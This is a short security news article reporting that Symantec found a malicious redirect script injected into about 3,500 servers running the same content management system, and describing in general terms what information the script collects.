Malware, Network Security

Symantec detects 3,500 servers infected with a malicious script

Symantec reported the worldwide infection of 3,500 public servers with a malicious script that redirects victims to other compromised websites that could be used to download malware and which the company said could be part of a recon effort for future attacks.

The security firm detected the script using the company's Intrusion Prevention System signature, which detects when a hidden script injected in a compromised website is used to redirect users to a website hosting malicious code and is triggered when a user browses a compromised website. Symantec said the compromised websites all used the same content management system.

At this time no malware was associated with this injection attack and does not lead to any malicious downloads.

“It is likely that the attacks are a reconnaissance activity to learn more about users and utilize that information in another attack. The possibilities for future attacks include the delivery of advertisements, SEO poisoning attacks, or criminals modifying the code to deliver malware and compromise unprotected users,” wrote Christian Tripputi, a security support manager for Symantec.

The attack's modus operandi has a compromised page being loaded user's browser when that person visits the site. The malicious script then waits 10 seconds and then runs remote JavaScript code, which the runs several additional scripts in an attempt to hide the malicious script from the victim.

The scripts then collect information to include: page title, URL, referrer, Shockwave Flash version, user language, monitor resolution and host IP address.

About 75 percent of the infected websites, generally business, .edu and government types, are located in the U.S.

Get daily email updates

SC Media's daily must-read of the most current and pressing daily news

By clicking the Subscribe button below, you agree to SC Media Terms and Conditions and Privacy Policy.